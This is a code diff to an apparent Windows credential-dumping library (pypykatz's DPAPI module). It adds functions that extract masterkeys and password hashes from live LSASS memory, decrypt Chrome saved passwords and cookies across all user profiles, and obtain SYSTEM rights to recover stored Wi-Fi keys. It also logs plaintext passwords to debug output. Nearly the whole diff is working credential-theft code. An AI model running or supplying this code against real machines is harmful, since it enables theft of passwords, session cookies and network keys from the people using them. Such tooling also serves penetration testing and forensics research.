@@ -5,10 +5,16 @@
 #
 
 import os
+import ntpath
 import json
 import hmac
 import hashlib
+import glob
+import sqlite3
+import base64
+import platform
 from hashlib import sha1, pbkdf2_hmac
+import xml.etree.ElementTree as ET
 
 from pypykatz import logger
 from pypykatz.dpapi.structures.masterkeyfile import MasterKeyFile
@@ -17,9 +23,13 @@ from pypykatz.dpapi.structures.blob import DPAPI_BLOB
 from pypykatz.dpapi.structures.vault import VAULT_VCRD, VAULT_VPOL, VAULT_VPOL_KEYS
 
 from pypykatz.crypto.unified.aes import AES
+from pypykatz.crypto.unified.aesgcm import AES_GCM
 from pypykatz.crypto.unified.common import SYMMETRIC_MODE
 from pypykatz.commons.common import UniversalEncoder
 
+if platform.system().lower() == 'windows':
+	from pypykatz.commons.winapi.processmanipulator import ProcessManipulator
+
 """
 So! DPAPI...
 
@@ -80,10 +90,9 @@ TODO: A LOT! currently fetching backupkeys from the DC is not supported. and pro
 """
 
 class DPAPI:
-	def __init__(self):
-		#pre-keys
-		self.user_keys = []
-		self.machine_keys = []
+	def __init__(self, use_winapi = False):
+		self.use_winapi = use_winapi
+		self.prekeys = {} #keys in bytes format stored in a dict for avoiding dupes
 		
 		#masterkey, backupkey
 		self.masterkeys = {} #guid -> binary value
@@ -92,33 +101,21 @@ class DPAPI:
 		#since so far I dunno how to match vault-keys to vaults, its a list :(
 		self.vault_keys = []
 	
-	@staticmethod
-	def list_masterkeys():
-		#logger.debug('Searching for MasterKey files...')
-		#appdata = os.environ.get('APPDATA')
-		#'%APPDATA%\Microsoft\Protect\%SID%'
-		#'%SYSTEMDIR%\Microsoft\Protect'
-		# TODO: implement this
-		pass
 
 	def dump_pre_keys(self, filename = None):
 		if filename is None:
-			for x in self.user_keys:
-				print(x.hex())
-			for x in self.machine_keys:
+			for x in self.prekeys:
 				print(x.hex())
 		else:
 			with open(filename, 'w', newline = '') as f:
-				for x in self.user_keys:
-					f.write(x.hex() + '\r\n')
-				for x in self.machine_keys:
+				for x in self.prekeys:
 					f.write(x.hex() + '\r\n')
 
-	def load_pre_keys(self, filename):
+	def load_prekeys(self, filename):
 		with open(filename, 'r') as f:
 			for line in f:
 				line = line.strip()
-				self.user_keys.append(bytes.fromhex(line))
+				self.prekeys[bytes.fromhex(line)] = 1
 
 	def dump_masterkeys(self, filename = None):
 		if filename is None:
@@ -141,7 +138,6 @@ class DPAPI:
 		for guid in data['masterkeys']:
 			self.masterkeys[guid] = bytes.fromhex(data['masterkeys'][guid])
 
-		print(self.masterkeys)
 		
 	def get_prekeys_from_password(self, sid, password = None, nt_hash = None):
 		"""
@@ -175,11 +171,15 @@ class DPAPI:
 		key3 = hmac.new(tmp_key_2, (sid + '\0').encode('utf-16le'), sha1).digest()[:20]
 		
 		if key1 is not None:
-			self.user_keys.append(key1)
-		self.user_keys.append(key2)
-		self.user_keys.append(key3)
+			self.prekeys[key1] = 1
+		self.prekeys[key2] = 1
+		self.prekeys[key3] = 1
+		
+		if key1 is not None:
+			logger.debug('Prekey_1 %s %s %s %s' % (sid, password, nt_hash, key1.hex()))
+		logger.debug('Prekey_2 %s %s %s %s' % (sid, password, nt_hash, key2.hex()))
+		logger.debug('Prekey_3 %s %s %s %s' % (sid, password, nt_hash, key3.hex()))
 		
-		#print(key1.hex(), key2.hex(), key3.hex())
 		return key1, key2, key3
 				
 	def __get_registry_secrets(self, lr):
@@ -198,9 +198,9 @@ class DPAPI:
 				if isinstance(secret, LSASecretDPAPI):
 					logger.debug('[DPAPI] Found DPAPI user key in registry! Key: %s' % secret.user_key)
 					logger.debug('[DPAPI] Found DPAPI machine key in registry! Key: %s' % secret.machine_key)
-					self.user_keys.append(secret.user_key)
+					self.prekeys[secret.user_key] = 1
 					user.append(secret.user_key)
-					self.machine_keys.append(secret.machine_key)
+					self.prekeys[secret.machine_key] = 1
 					machine.append(secret.machine_key)
 		
 		if lr.sam is not None:
@@ -256,6 +256,34 @@ class DPAPI:
 		else:
 			raise Exception('[DPAPI] Registry parsing failed!')
 			
+	def get_all_keys_from_lsass_live(self):
+		"""
+		Parses the live LSASS process and extracts the plaintext masterkeys, and also generates prekeys from all available credentials
+		It does not retun anything, just sets up all key material in the object
+		return: None
+		"""
+		from pypykatz.pypykatz import pypykatz
+		katz = pypykatz.go_live()
+		sids = [katz.logon_sessions[x].sid for x in katz.logon_sessions]
+		for x in katz.logon_sessions:
+			for dc in katz.logon_sessions[x].dpapi_creds:
+				logger.debug('[DPAPI] Got masterkey for GUID %s via live LSASS method' % dc.key_guid)
+				self.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)
+			
+			for package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():
+				if package.lower() == 'dpapi':
+					continue
+				
+				sids = [katz.logon_sessions[x].sid]
+				for sid in sids:
+					if plaintext is not None:
+						self.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)
+					if nthex is not None and len(nthex) == 32:
+						self.get_prekeys_from_password(sid, password = None, nt_hash = nthex)
+				
+				if shahex is not None and len(shahex) == 40:
+					self.prekeys[bytes.fromhex(shahex)] = 1
+			
 	def get_masterkeys_from_lsass_live(self):
 		"""
 		Parses the live LSASS process and extracts the plaintext masterkeys
@@ -284,6 +312,20 @@ class DPAPI:
 			for dc in katz.logon_sessions[x].dpapi_creds:
 				logger.debug('[DPAPI] Got masterkey for GUID %s via minidump LSASS method' % dc.key_guid)
 				self.masterkeys[dc.key_guid] = bytes.fromhex(dc.masterkey)
+
+		for package,_,_, nthex, lmhex, shahex, _,_,_, plaintext in katz.logon_sessions[x].to_grep_rows():
+				if package.lower() == 'dpapi':
+					continue
+				
+				sids = [katz.logon_sessions[x].sid]
+				for sid in sids:
+					if plaintext is not None:
+						self.get_prekeys_from_password(sid, password = plaintext, nt_hash = None)
+					if nthex is not None and len(nthex) == 32:
+						self.get_prekeys_from_password(sid, password = None, nt_hash = nthex)
+				
+				if shahex is not None and len(shahex) == 40:
+					self.prekeys[bytes.fromhex(shahex)] = 1
 				
 		return self.masterkeys
 			
@@ -309,70 +351,64 @@ class DPAPI:
 		mks = {}
 		bks = {}
 		if mkf.masterkey is not None:
-			for user_key in self.user_keys:
-				dec_key = mkf.masterkey.decrypt(user_key)
-				if dec_key:
-					self.masterkeys[mkf.guid] = dec_key
-					mks[mkf.guid] = dec_key				
+			if mkf.guid in self.masterkeys:
+				mks[mkf.guid] = self.masterkeys[mkf.guid]
 				
-			for machine_key in self.machine_keys:
-				dec_key = mkf.masterkey.decrypt(machine_key)
-				if dec_key:
-					self.masterkeys[mkf.guid] = dec_key
-					mks[mkf.guid] = dec_key
-					
-			if key is not None:
-				dec_key = mkf.masterkey.decrypt(key)
-				if dec_key:
-					self.masterkeys[mkf.guid] = dec_key
-					mks[mkf.guid] = dec_key
+			else:
+				for user_key in self.prekeys:
+					dec_key = mkf.masterkey.decrypt(user_key)
+					if dec_key:
+						logger.debug('user key win: %s' % user_key.hex())
+						self.masterkeys[mkf.guid] = dec_key
+						mks[mkf.guid] = dec_key
+						break
+						
+				if key is not None:
+					dec_key = mkf.masterkey.decrypt(key)
+					if dec_key:
+						self.masterkeys[mkf.guid] = dec_key
+						mks[mkf.guid] = dec_key
 		
 		if mkf.backupkey is not None:
-			for user_key in self.user_keys:
-				dec_key = mkf.backupkey.decrypt(user_key)
-				if dec_key:
-					self.backupkeys[mkf.guid] = dec_key
-					bks[mkf.guid] = dec_key				
+			if mkf.guid in self.masterkeys:
+				mks[mkf.guid] = self.masterkeys[mkf.guid]
 				
-			for machine_key in self.machine_keys:
-				dec_key = mkf.backupkey.decrypt(machine_key)
-				if dec_key:
-					self.backupkeys[mkf.guid] = dec_key
-					bks[mkf.guid] = dec_key
-					
-			if key is not None:
-				dec_key = mkf.backupkey.decrypt(key)
-				if dec_key:
-					self.masterkeys[mkf.guid] = dec_key
-					bks[mkf.guid] = dec_key
+			else:
+				for user_key in self.prekeys:
+					dec_key = mkf.backupkey.decrypt(user_key)
+					if dec_key:
+						self.backupkeys[mkf.guid] = dec_key
+						bks[mkf.guid] = dec_key
+						break
+						
+				if key is not None:
+					dec_key = mkf.backupkey.decrypt(key)
+					if dec_key:
+						self.masterkeys[mkf.guid] = dec_key
+						bks[mkf.guid] = dec_key
 					
 		return mks, bks
 	
-	def decrypt_credential_file(self, file_path, key = None):
+	def decrypt_credential_file(self, file_path):
 		"""
 		Decrypts CredentialFile
 		file_path: path to CredentialFile
-		key: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.
 		returns: CREDENTIAL_BLOB object
 		"""
-		if key is not None:
-			if isinstance(key, str):
-				key = bytes.fromhex(key)
 		with open(file_path, 'rb') as f:
-			return self.decrypt_credential_bytes(f.read(), key = key)
+			return self.decrypt_credential_bytes(f.read())
 	
-	def decrypt_credential_bytes(self, data, key = None):
+	def decrypt_credential_bytes(self, data):
 		"""
 		Decrypts CredentialFile bytes
 		CredentialFile holds one DPAPI blob, so the decryption is straightforward, and it also has a known structure for the cleartext.
 		Pay attention that the resulting CREDENTIAL_BLOB strucutre's fields can hold the secrets in wierd filenames like "unknown"
 		
 		data: CredentialFile bytes
-		key: raw bytes of the decryption key. If not supplied the function will look for keys already cached in the DPAPI object.
 		returns: CREDENTIAL_BLOB object
 		"""
 		cred = CredentialFile.from_bytes(data)
-		dec_data = self.decrypt_blob(cred.blob, key = key)
+		dec_data = self.decrypt_blob_bytes(cred.data)
 		cb = CREDENTIAL_BLOB.from_bytes(dec_data)
 		return cb
 		
@@ -399,10 +435,15 @@ class DPAPI:
 		data: DPAPI_BLOB bytes
 		returns: bytes of the cleartext data
 		"""
+		if self.use_winapi is True:
+			from pypykatz.dpapi.functiondefs.dpapi import CryptUnprotectData
+			return CryptUnprotectData(data)
+		
 		blob = DPAPI_BLOB.from_bytes(data)
+		logger.debug(str(blob))
 		return self.decrypt_blob(blob, key = key)
 		
-	def decrypt_vcrd_file(self, file_path, key = None):
+	def decrypt_vcrd_file(self, file_path):
 		"""
 		Decrypts a VCRD file
 		Location: %APPDATA%\Local\Microsoft\Vault\%GUID%\<>.vcrd
@@ -410,15 +451,10 @@ class DPAPI:
 		file_path: path to the vcrd file
 		returns: dictionary of attrbitues as key, and a list of possible decrypted data
 		"""
-		
-		if key is not None:
-			if isinstance(key, str):
-				key = bytes.fromhex(key)
-
 		with open(file_path, 'rb') as f:
-			return self.decrypt_vcrd_bytes(f.read(), key = key)
+			return self.decrypt_vcrd_bytes(f.read())
 			
-	def decrypt_vcrd_bytes(self, data, key = None):
+	def decrypt_vcrd_bytes(self, data):
 		"""
 		Decrypts VCRD file bytes.
 		
@@ -426,9 +462,9 @@ class DPAPI:
 		returns: dictionary of attrbitues as key, and a list of possible decrypted data
 		"""
 		vv = VAULT_VCRD.from_bytes(data)
-		return self.decrypt_vcrd(vv, key = key)
+		return self.decrypt_vcrd(vv)
 		
-	def decrypt_vcrd(self, vcrd, key = None):
+	def decrypt_vcrd(self, vcrd):
 		"""
 		Decrypts the attributes found in a VCRD object, and returns the cleartext data candidates
 		A VCRD file can have a lot of stored credentials inside, most of them with custom data strucutre
@@ -450,23 +486,15 @@ class DPAPI:
 				return cleartext
 		
 		res = {}
-		if key is None:
-			for i, key in enumerate(self.vault_keys):
-				for attr in vcrd.attributes:
-					cleartext = decrypt_attr(attr, key)
-					if attr not in res:
-						res[attr] = []
-					res[attr].append(cleartext)
-		else:
+		for i, key in enumerate(self.vault_keys):
 			for attr in vcrd.attributes:
-				decrypt_attr(attr, key)
+				cleartext = decrypt_attr(attr, key)
 				if attr not in res:
 					res[attr] = []
 				res[attr].append(cleartext)
-		
 		return res
 					
-	def decrypt_vpol_bytes(self, data, key = None):
+	def decrypt_vpol_bytes(self, data):
 		"""
 		Decrypts the VPOL file, and returns the two keys' bytes
 		A VPOL file stores two encryption keys.
@@ -475,7 +503,7 @@ class DPAPI:
 		returns touple of bytes, describing two keys
 		"""
 		vpol = VAULT_VPOL.from_bytes(data)
-		res = self.decrypt_blob(vpol.blob, key = key)
+		res = self.decrypt_blob_bytes(vpol.blobdata)
 		
 		keys = VAULT_VPOL_KEYS.from_bytes(res)
 		
@@ -484,7 +512,7 @@ class DPAPI:
 		
 		return keys.key1.get_key(), keys.key2.get_key()
 		
-	def decrypt_vpol_file(self, file_path, key = None):
+	def decrypt_vpol_file(self, file_path):
 		"""
 		Decrypts a VPOL file
 		Location: %APPDATA%\Local\Microsoft\Vault\%GUID%\<>.vpol
@@ -493,9 +521,274 @@ class DPAPI:
 		keys: Optional.
 		returns: touple of bytes, describing two keys
 		"""
-		if key is not None:
-			if isinstance(key, str):
-				key = bytes.fromhex(key)
 		with open(file_path, 'rb') as f:
-			return self.decrypt_vpol_bytes(f.read(), key = key)
+			return self.decrypt_vpol_bytes(f.read())
 
+	def decrypt_securestring_bytes(self, data):
+		return self.decrypt_blob_bytes(data)
+		
+	def decrypt_securestring_hex(self, hex_str):
+		return self.decrypt_securestring_bytes(bytes.fromhex(hex_str))
+	
+	def decrypt_securestring_file(self, file_path):
+		with open(file_path, 'r') as f:
+			data = f.read()
+		return self.decrypt_securestring_hex(data)
+		
+	
+	@staticmethod
+	def find_masterkey_files_live():
+		windows_loc = DPAPI.get_windows_dir_live()
+		user_folder = DPAPI.get_users_dir_live()
+		
+		return DPAPI.find_masterkey_files_offline(user_folder, windows_loc)
+	
+	@staticmethod
+	def find_masterkey_files_offline(users_path, windows_path):
+		def is_guid(fname):
+			if os.path.isfile(filename) is True:
+				base = ntpath.basename(filename)
+				if base.find('-') == -1:
+					return False
+				try:
+					bytes.fromhex(base.replace('-',''))
+				except:
+					return False
+				return True
+			return False
+		
+		masterkey_files = {}
+		for filename in glob.glob(os.path.join(windows_path, "System32","Microsoft","Protect", "**"), recursive = True):
+			if is_guid(filename) is True:
+				logger.debug('GUID SYSTEM FILE: %s' % filename)
+				masterkey_files[ntpath.basename(filename)] = filename
+		
+		user_folders = {}
+		for filename in glob.glob(os.path.join(users_path, '*'), recursive=False):
+			if os.path.isdir(filename):
+				user_folders[filename] = 1
+		
+		for subfolder in ['Local', 'Roaming', 'LocalLow']:
+			for user_folder in user_folders:
+				for filename in glob.glob(os.path.join(user_folder, "AppData", subfolder, "Microsoft", "Protect", '**'), recursive = True):
+					if is_guid(filename) is True:
+						masterkey_files[ntpath.basename(filename)] = filename
+						logger.debug('GUID USER FILE: %s' % filename)
+		
+		return masterkey_files
+	
+	@staticmethod
+	def get_users_dir_live():
+		username = os.environ.get('USERNAME')
+		userprofile_loc = os.environ.get('USERPROFILE')
+		username = os.environ.get('USERNAME')
+		return userprofile_loc[:-len(username)]
+	
+	@staticmethod
+	def get_windows_dir_live():
+		return os.environ.get('SystemRoot')
+
+	@staticmethod
+	def get_windows_drive_live():
+		return os.environ.get('SystemDrive')[0]
+	
+	@staticmethod
+	def find_chrome_database_file_live():
+		return DPAPI.find_chrome_database_file_offline(DPAPI.get_users_dir_live())
+	
+	@staticmethod
+	def find_chrome_database_file_offline(users_path):
+		db_paths = {} # username -> files
+		user_folders = {} # username -> folder
+		
+		for filename in glob.glob(os.path.join(users_path, '*'), recursive=False):
+			if os.path.isdir(filename):
+				username = ntpath.basename(filename)
+				if username not in user_folders:
+					user_folders[username] = []
+				user_folders[username].append(filename)
+				
+		for subfolder_1 in ['Local', 'Roaming', 'LocalLow']:
+			for subfolder_2 in ['', 'Google']:
+				for username in user_folders:
+					if username not in db_paths:
+						db_paths[username] = {}
+					for user_folder in user_folders[username]:
+						db_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Login Data' )
+						if os.path.isfile(db_path) is True:
+							db_paths[username]['logindata'] = db_path
+							logger.debug('CHROME LOGINS DB FILE: %s' % db_path)
+
+						db_cookies_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data','Default','Cookies' )
+						if os.path.isfile(db_cookies_path) is True:
+							db_paths[username]['cookies'] = db_cookies_path
+							logger.debug('CHROME COOKIES DB FILE: %s' % db_cookies_path)
+
+						localstate_path = os.path.join(user_folder, 'AppData', subfolder_1, subfolder_2, 'Chrome','User Data', 'Local State' )
+						if os.path.isfile(localstate_path) is True:
+							db_paths[username]['localstate'] = localstate_path
+							logger.debug('CHROME localstate FILE: %s' % localstate_path)
+				
+		return db_paths
+	
+	@staticmethod
+	def get_chrome_encrypted_secret(db_path):
+		results = {}
+		results['logins'] = []
+		results['cookies'] = []
+		results['localstate'] = []
+
+		try:
+			conn = sqlite3.connect(db_path)
+			cursor = conn.cursor()
+		except Exception as e:
+			logger.debug('Failed to open chrome DB file %s' % db_path)
+			return results
+		
+		if ntpath.basename(db_path).lower() == 'cookies':
+			try:
+				#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py
+				cursor.execute('SELECT host_key, name, path, encrypted_value FROM cookies')
+			except Exception as e:
+				logger.debug('Failed perform query on chrome DB file %s Reason: %s' % (db_path, e))
+				return results
+			
+			for host_key, name, path, encrypted_value in cursor.fetchall():
+				results['cookies'].append((host_key, name, path, encrypted_value))
+
+		elif ntpath.basename(db_path).lower() == 'login data':
+
+			try:
+				#totally not stolen from here https://github.com/byt3bl33d3r/chrome-decrypter/blob/master/chrome_decrypt.py
+				cursor.execute('SELECT action_url, username_value, password_value FROM logins')
+			except Exception as e:
+				logger.debug('Failed perform query on chrome DB file %s Reason: %s' % (db_path, e))
+				return results
+				
+			for url, user, enc_pw in cursor.fetchall():
+				results['logins'].append((url, user, enc_pw))
+		
+		return results
+		
+	def decrypt_all_chrome_live(self):
+		results = {}
+		results['logins'] = []
+		results['cookies'] = []
+		localstate_dec = None
+
+		dbpaths = DPAPI.find_chrome_database_file_live()
+		for username in dbpaths:
+			if 'localstate' in dbpaths[username]:
+				with open(dbpaths[username]['localstate'], 'r') as f:
+					encrypted_key = json.load(f)['os_crypt']['encrypted_key']
+					encrypted_key = base64.b64decode(encrypted_key)
+				
+				localstate_dec = self.decrypt_blob_bytes(encrypted_key[5:])
+
+			if 'cookies' in dbpaths[username]:
+				secrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['cookies'])
+				for host_key, name, path, encrypted_value in secrets['cookies']:
+					if encrypted_value.startswith(b'v10'):
+						nonce = encrypted_value[3:3+12]
+						ciphertext = encrypted_value[3+12:-16]
+						tag = encrypted_value[-16:]
+						cipher = AES_GCM(localstate_dec)
+						dec_val = cipher.decrypt(nonce, ciphertext, tag, auth_data=b'') 
+						results['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))
+					else:
+						dec_val = self.decrypt_blob_bytes(encrypted_value)
+						results['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))
+
+			if 'logindata' in dbpaths[username]:
+				secrets = DPAPI.get_chrome_encrypted_secret(dbpaths[username]['logindata'])
+				for url, user, enc_password in secrets['logins']:
+					password = self.decrypt_blob_bytes(enc_password)
+					results['logins'].append((dbpaths[username]['logindata'], url, user, password ))
+				
+				
+		return results
+		
+	def get_all_masterkeys_live(self):
+		try:
+			self.get_all_keys_from_lsass_live()
+		except:
+			logger.debug('Failed to get masterkeys/prekeys from LSASS!')
+			
+		try:
+			self.get_prekeys_form_registry_live()
+		except Exception as e:
+			logger.debug('Failed to get masterkeys/prekeys from registry!')
+		
+		mkfiles = DPAPI.find_masterkey_files_live()
+		for guid in mkfiles:
+			logger.debug('Decrypting masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))
+			mk, bk = self.decrypt_masterkey_file(mkfiles[guid])
+			if len(mk) > 0 or len(bk) > 0:
+				logger.debug('Decrypted masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))
+			else:
+				logger.debug('Failed to decrypt masterkeyfile with guid: %s location: %s' % (guid, mkfiles[guid]))
+		
+		return self.masterkeys, self.backupkeys
+	
+	@staticmethod
+	def parse_wifi_config_file(filepath):
+		wifi = {}
+		tree = ET.parse(filepath)
+		root = tree.getroot()
+
+		for child in root:
+			if child.tag.endswith('}name'):
+				wifi['name'] = child.text
+			elif child.tag.endswith('}MSM'):
+				for pc in child.iter():
+					if pc.tag.endswith('}keyMaterial'):
+						wifi['enckey'] = pc.text
+		return wifi
+
+	@staticmethod
+	def get_all_wifi_settings_offline(system_drive_letter):
+		wifis = []
+		for filename in glob.glob(system_drive_letter+':\\ProgramData\\Microsoft\\Wlansvc\\Profiles\\Interfaces\\**', recursive=True):
+			if filename.endswith('.xml'):
+				wifi = DPAPI.parse_wifi_config_file(filename)
+				wifis.append(wifi)
+		return wifis
+
+	@staticmethod
+	def get_all_wifi_settings_live():
+		return DPAPI.get_all_wifi_settings_offline(DPAPI.get_windows_drive_live())
+
+	def decrypt_wifi_live(self):
+		# key is encrypted as system!!!
+		pm = ProcessManipulator()
+		try:
+			try:
+				pm.getsystem()
+			except Exception as e:
+				raise Exception('Failed to obtain SYSTEM privileges! Are you admin? Error: %s' % e)
+			
+			for wificonfig in DPAPI.get_all_wifi_settings_live():
+				if 'enckey' in wificonfig and wificonfig['enckey'] != '':
+					wificonfig['key'] = self.decrypt_securestring_hex(wificonfig['enckey'])
+					yield wificonfig
+
+		finally:
+			pm.dropsystem()
+
+# arpparse helper
+def prepare_dpapi_live(methods = [], mkf = None, pkf = None):
+	dpapi = DPAPI()
+	
+	if mkf is not None:
+		dpapi.load_masterkeys(mkf)
+	if pkf is not None:
+		dpapi.load_prekeys(mkf)
+	
+	if 'all' in methods:
+		dpapi.get_all_masterkeys_live()
+	if 'registry' in methods and 'all' not in methods:
+		dpapi.get_prekeys_form_registry_live()
+	if 'lsass' in methods and 'all' not in methods:
+		dpapi.get_masterkeys_from_lsass_live()
+	
+	return dpapi
\ No newline at end of file
